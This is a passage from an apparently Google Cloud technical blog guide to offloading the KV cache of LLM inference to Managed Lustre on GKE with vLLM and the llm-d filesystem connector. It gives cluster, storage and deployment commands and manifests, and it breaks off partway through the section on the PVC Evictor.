&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The Managed Lustre KV Cache offload architecture can be extended via integration of offload to CPU RAM. This hybrid approach &lt;/span&gt;&lt;a href="https://github.com/llm-d/llm-d/tree/main/guides/tiered-prefix-cache#llm-d-fs-connector--lustre" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;significantly improves performance compared to CPU offload only&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, delivering approximately 40% improvement in Time to First Token (TTFT) and a 30% reduction in end-to-end latency, for Llama-3.3-70B inference. &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;User Guide&lt;/h3&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;Architectural Components&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;GKE GPU Nodes:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Dedicated accelerator resources provisioned exclusively for high-throughput model execution and tensor-parallel operations.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Managed Lustre:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; A shared, high-bandwidth parallel filesystem acting as a centralized external tier that caches prefilled attention states to eliminate redundant prefill computation.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;a href="https://github.com/llm-d/llm-d-kv-cache/tree/main/kv_connectors/pvc_evictor" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;PVC Evictor&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; A scalable, distributed garbage collection service that tracks file access patterns and automatically removes Least-Recently-Used (LRU) cache chunks to maintain healthy storage headroom.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;Target Models&lt;/h4&gt;
&lt;p&gt;This guide provides two distinct, validated tracks for deployment depending on your model preference:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Qwen Series:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;Qwen/Qwen3.5-35B-A3B&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Gemma 4 Architecture:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;google/gemma-4-31B-it&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;Architectural Diagram&lt;/h4&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Scaling LLM Inference_ Multi-Node KV Cache Offloading with GKE &amp;amp; Managed Lustre" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Scaling_LLM_Inference__Multi-Node_KV_Cache.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;Before You Begin&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Before starting this deployment, ensure your Google Cloud project is properly configured:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Quota:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Verify you have sufficient quota for the selected accelerators in your chosen region, as well as adequate general CPU, memory, and Managed Lustre quotas.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;a href="https://docs.cloud.google.com/managed-lustre/docs/access-control" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Validate Required IAM Permissions for Managed Lustre&lt;/strong&gt;&lt;/a&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Prepare your Environment to Connect to Managed Lustre:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Complete the “&lt;/span&gt;&lt;a href="https://docs.cloud.google.com/managed-lustre/docs/lustre-csi-driver-new-volume#before_you_begin" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Before You Begin&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;” steps to enable APIs, set up environment variables, and set up your VPC.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;GKE Version:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/concepts/managed-lustre" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Managed Lustre CSI driver&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; is supported on GKE versions &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;1.33 or later&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. For the best experience and default port (988) usage, GKE version &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;1.33.2-gke.4780000 or later&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; is recommended.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;Overview of Required Steps&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;Create the GKE Cluster&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Create the GPU Compute node pool&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Provision Lustre storage&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Deploy vLLM Serving Engine with Lustre&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Deploy the PVC Evictor&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Clean Up&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;1. Create the GKE Cluster&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Create a rapid-channel GKE cluster with Workload Identity and all necessary CSI storage add-ons enabled (Lustre, GCSFuse and Persistent Disk).&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;export CLUSTER_NAME=&amp;quot;&amp;lt;INSERT CLUSTER NAME&amp;gt;&amp;quot;\r\nexport ZONE=&amp;quot;&amp;lt;INSERT ZONE&amp;gt;&amp;quot;\r\nexport PROJECT_ID=&amp;quot;&amp;lt;INSERT PROJECT&amp;gt;&amp;quot;\r\nexport NETWORK_NAME=&amp;quot;&amp;lt;INSERT NETWORK&amp;gt;&amp;quot;\r\n\r\ngcloud container clusters create &amp;quot;$CLUSTER_NAME&amp;quot; \\\r\n    --zone &amp;quot;$ZONE&amp;quot; \\\r\n    --num-nodes &amp;quot;1&amp;quot; \\\r\n    --network &amp;quot;${NETWORK_NAME}&amp;quot; \\\r\n    --addons &amp;quot;HorizontalPodAutoscaling,HttpLoadBalancing,GcePersistentDiskCsiDriver,GcsFuseCsiDriver,LustreCsiDriver&amp;quot; \\\r\n    --workload-pool &amp;quot;${PROJECT_ID}.svc.id.goog&amp;quot; \\\r\n    --enable-managed-prometheus \\\r\n    --enable-ip-alias \\\r\n    --enable-shielded-nodes \\\r\n    --shielded-integrity-monitoring \\\r\n    --no-shielded-secure-boot \\\r\n    --node-locations &amp;quot;$ZONE&amp;quot; \\\r\n    --network=&amp;quot;${NETWORK_NAME}&amp;quot; \\\r\n    --gateway-api=standard&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe6b1017580&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="color: #000000;"&gt;2. Create the GPU Compute Node Pool&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Provision an GPU VM node pool ( e.g. &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;a3-megagpu-4g&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;a4-highgpu-4g&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, etc.).&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;gcloud beta container node-pools create gpu-vm nodepool \\\r\n    --location=&amp;quot;$ZONE&amp;quot; \\\r\n    --cluster=&amp;quot;$CLUSTER_NAME&amp;quot; \\\r\n    --project=&amp;quot;$PROJECT_ID&amp;quot; \\\r\n    --accelerator=&amp;quot;type=&amp;lt;INSERT GPU_ACCELERATOR_NAME&amp;gt;,count=&amp;lt;INSERT GPU_COUNT&amp;gt;,gpu-driver-version=LATEST&amp;quot; \\\r\n    --machine-type=&amp;quot;&amp;lt;INSERT GPU_COMPUTE_VM_MACHINE TYPE&amp;gt;&amp;quot; \\\r\n    --num-nodes=&amp;quot;&amp;lt;INSERT NODE_COUNT&amp;gt;&amp;quot; \\\r\n    --enable-gvnic \\\r\n    --no-enable-autoupgrade\r\n\r\n# Fetch cluster credentials\r\ngcloud container clusters get-credentials &amp;quot;$CLUSTER_NAME&amp;quot; --zone &amp;quot;$ZONE&amp;quot;&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe6b1017a90&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;3. Provision Lustre Storage (Auto-provisioned)&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Before deploying vLLM, you need to provision the Lustre storage. We use an auto-provisioned Lustre instance via a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;StorageClass&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and a &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;PersistentVolumeClaim&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; (PVC).&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Create a file named &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;lustre-pvc.yaml&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; with the following content:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;apiVersion: storage.k8s.io/v1\r\nkind: StorageClass\r\nmetadata:\r\n  name: lustre-class\r\nprovisioner: lustre.csi.storage.gke.io\r\nvolumeBindingMode: Immediate\r\nreclaimPolicy: Delete\r\nmountOptions:\r\n  - localflock\r\nparameters:\r\n  perUnitStorageThroughput: &amp;quot;&amp;lt;CHOOSE_PERFORMANCE_TIER&amp;gt;&amp;quot; # See options below.\r\n  network: &amp;quot;&amp;lt;INSERT NETWORK_NAME&amp;gt;&amp;quot;\r\n---\r\napiVersion: v1\r\nkind: PersistentVolumeClaim\r\nmetadata:\r\n  name: lustre-pvc\r\nspec:\r\n  accessModes:\r\n  - ReadWriteMany\r\n  resources:\r\n    requests:\r\n      storage: &amp;lt;INSERT CAPACITY_GiB&amp;gt; # Range from 9000Gi to 84016000Gi, increments and ranges are Lustre tier-dependent.\r\n  storageClassName: lustre-class&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe6b10177c0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Notes: Performance tier options are “125”, “250”, “500”, and “1000”.  Per-tier capacity ranges and increments can be found &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/managed-lustre/docs/performance-tiers" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Apply this manifest to provision the Lustre instance and observe provisioning:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;# 1. Submit the file to the cluster (finishes instantly)\r\nkubectl apply -f lustre-pvc.yaml\r\n\r\n# 2. Watch the live provisioning stream until it says &amp;quot;Bound&amp;quot;\r\nkubectl get pvc lustre-pvc -w&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe6b1017af0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;4. Deploy vLLM Serving Engine with Lustre&lt;/h4&gt;
&lt;p style="padding-left: 40px;"&gt;&lt;strong&gt;&lt;span style="color: #5f6368;"&gt;Step 4a: Create the Hugging Face Access Secret&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Before submitting the deployment manifest, you must provision your Hugging Face API &lt;/span&gt;&lt;a href="https://huggingface.co/docs/hub/en/security-tokens" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;token&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; as a secure secret within the cluster.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Run the following command, replacing `&amp;lt;INSERT_HF_TOKEN&amp;gt;` with your token:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;kubectl create secret generic hf-token-secret \\\r\n    --from-literal=token=&amp;quot;&amp;lt;INSERT_HF_TOKEN&amp;gt;&amp;quot; \\\r\n    --namespace=default&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe6b10175e0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p style="padding-left: 40px;"&gt;&lt;strong&gt;&lt;span style="color: #5f6368;"&gt;Step 4b: Create the vLLM Deployment Manifest&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This complete Kubernetes manifest deploys the vLLM engine, configures the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;llmd-fs-connector&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; for high-performance KV-caching, and mounts your parallel Lustre storage (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;lustre-pvc&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;).&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="color: #5f6368;"&gt;&lt;span style="vertical-align: baseline;"&gt;Common Manifest (Choose between Qwen3.5 or gemma-4)&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Replace example values between &amp;lt;&amp;gt; with appropriate values for your environment.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;apiVersion: apps/v1\r\nkind: Deployment\r\nmetadata:\r\n  name: vllm-storage\r\n  namespace: default\r\n  labels:\r\n    app: vllm-storage\r\nspec:\r\n  replicas: 1\r\n  selector:\r\n    matchLabels:\r\n      app: vllm-storage\r\n  template:\r\n    metadata:\r\n      labels:\r\n        app: vllm-storage\r\n    spec:\r\n      nodeSelector:\r\n        cloud.google.com/gke-accelerator: nvidia-h100-80gb\r\n      tolerations:\r\n        - key: &amp;quot;nvidia.com/gpu&amp;quot;\r\n          operator: &amp;quot;Exists&amp;quot;\r\n          effect: &amp;quot;NoSchedule&amp;quot;\r\n      securityContext:\r\n        fsGroup: &amp;lt;YOUR_NON_ROOT_GID&amp;gt;\r\n        runAsUser: &amp;lt;YOUR_NON_ROOT_UID&amp;gt;\r\n      volumes:\r\n        - name: lustre-storage\r\n          persistentVolumeClaim:\r\n            claimName: lustre-pvc\r\n        - name: shm\r\n          emptyDir:\r\n            medium: Memory\r\n            sizeLimit: &amp;quot;200Gi&amp;quot;\r\n      containers:\r\n        - name: vllm-storage\r\n          image: vllm/vllm-openai:v0.23.0-cu129\r\n          volumeMounts:\r\n            - mountPath: /mnt/files-storage\r\n              name: lustre-storage\r\n          command:\r\n            - &amp;quot;/bin/bash&amp;quot;\r\n          args:\r\n            - &amp;quot;-c&amp;quot;\r\n            - |\r\n              set -x\r\n              export USER=vllm\r\n              export LOGNAME=vllm\r\n              pip install --user msgpack\r\n              pip install \&amp;#x27;llmd-fs-connector==0.23\&amp;#x27; --extra-index-url https://llm-d.github.io/llm-d-kv-cache/simple/\r\n              \r\n              vllm serve &amp;lt;MODEL_NAME&amp;gt; \\ # google/gemma-4-31B-it OR Qwen/Qwen3.5-35B-A3B\r\n              --download-dir /model/models \\\r\n              --load-format auto \\\r\n              --kv-transfer-config \&amp;#x27;{\r\n                   &amp;quot;kv_connector&amp;quot;: &amp;quot;MultiConnector&amp;quot;,\r\n                   &amp;quot;kv_role&amp;quot;: &amp;quot;kv_both&amp;quot;,\r\n                   &amp;quot;kv_connector_extra_config&amp;quot;: {\r\n                     &amp;quot;connectors&amp;quot;: [\r\n                       {\r\n                         &amp;quot;kv_connector&amp;quot;: &amp;quot;OffloadingConnector&amp;quot;,\r\n                         &amp;quot;kv_role&amp;quot;: &amp;quot;kv_both&amp;quot;,\r\n                         &amp;quot;kv_connector_extra_config&amp;quot;: {\r\n                           &amp;quot;cpu_bytes_to_use&amp;quot;: 64424509440,\r\n                           &amp;quot;lazy_offload&amp;quot;: true\r\n                         }\r\n                       },\r\n                       {\r\n                         &amp;quot;kv_connector&amp;quot;: &amp;quot;OffloadingConnector&amp;quot;,\r\n                         &amp;quot;kv_role&amp;quot;: &amp;quot;kv_both&amp;quot;,\r\n                         &amp;quot;kv_connector_extra_config&amp;quot;: {\r\n                           &amp;quot;spec_name&amp;quot;: &amp;quot;SharedStorageOffloadingSpec&amp;quot;,\r\n                           &amp;quot;spec_module_path&amp;quot;: &amp;quot;llmd_fs_backend.spec&amp;quot;,\r\n                           &amp;quot;shared_storage_path&amp;quot;: &amp;quot;/mnt/files-storage/llmd-kv-cache/&amp;quot;,\r\n                           &amp;quot;threads_per_gpu&amp;quot;: 32,\r\n                           &amp;quot;block_size&amp;quot;: &amp;lt;BLOCK_SIZE&amp;gt; # 256 for gemma or 528 for Qwen3.5\r\n                         }\r\n                       }\r\n                     ]\r\n                   }\r\n                 }\&amp;#x27; \\\r\n              --distributed_executor_backend &amp;quot;mp&amp;quot; \\\r\n              --port 8000 \\\r\n              --max_num_batched_tokens 16384 \\\r\n              --enable-chunked-prefill \\\r\n              --max-model-len 32000 \\\r\n              --gpu-memory-utilization 0.92 \\\r\n              --tensor-parallel-size &amp;quot;4&amp;quot; \\\r\n              --prefix-caching-hash-algo sha256_cbor \\\r\n              --enable_prefix_caching \\\r\n              --enforce-eager \\\r\n              --no-disable-hybrid-kv-cache-manager\r\n          env:\r\n            - name: HUGGING_FACE_HUB_TOKEN\r\n              valueFrom:\r\n                secretKeyRef:\r\n                  name: hf-token-secret\r\n                  key: token\r\n          # ... probes ...\r\n          resources:\r\n            requests:\r\n              nvidia.com/gpu: &amp;quot;4&amp;quot;\r\n            limits:\r\n              nvidia.com/gpu: &amp;quot;4&amp;quot;&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe6b1017ee0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Note: Qwen-3.5 specifically requires a block size of &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;528&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; to avoid fragmentation, while Gemma 4 functions perfectly with the default &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;256&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p style="padding-left: 40px;"&gt;&lt;strong&gt;&lt;span style="color: #5f6368;"&gt;&lt;span style="vertical-align: baseline;"&gt;Step 4c: Apply and Verify Deployment&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;To apply this manifest to your cluster, run:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;kubectl apply -n default -f vllm-lustre-deployment.yaml&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe6b1017fa0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p style="padding-left: 40px;"&gt;&lt;strong&gt;&lt;span style="color: #5f6368;"&gt;Step 4d: Track Model Download Status&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Because large models can take some time to download on first boot, track the initialization logs directly by streaming the container logs:&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Bash&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;kubectl rollout status deployment/vllm-storage&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7fe6b1017e50&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;5. Deploy the PVC Evictor&lt;/h4&gt;
&lt;h5&gt;&lt;span style="color: #5f6368;"&gt;PVC Evictor Overview&lt;/span&gt;&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style="color: #5f6368;"&gt;Architecture &amp;amp; Role&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;llmd_fs_backend&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; connector offloads KV-cache blocks to Lustre but does not natively delete old cache files. Over time, the cache will fill the shared filesystem. The &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;PVC Evictor&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; acts as an external garbage collector that continuously monitors disk usage and evicts least-recently-used (LRU) files to maintain healthy storage headroom.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style="color: #5f6368;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Scaling &amp;amp; Sharding&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The PVC Evictor supports sharding and can be scaled to multiple replicas to match the capacity and performance of your Lustre instance. As a rule of thumb, you should deploy &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;1 evictor replica for each 72 TB of Lustre capacity&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; to distribute the eviction load effectively without overwhelming the metadata servers.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For large-scale deployments, the evictor can be configured to run with multiple shards. When running in multi-replica mode, the workload is partitioned across pods, with each pod managing a specific shard of the cache namespace. This prevents redundant metadata scans and race conditions.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline; color: #5f6368;"&gt;High-Performance Resource Requirements&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Running the evictor at high scale (e.g., with 16 parallel crawler processes) requires significant CPU and memory resources to handle the rapid scanning and queue management of millions of files. Ensure that the pods are provisioned with sufficient resources (e.g., 12 CPU requests and 8Gi Memory requests) and scheduled on appropriate node types (such as &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;c4-standard-16&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;).&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
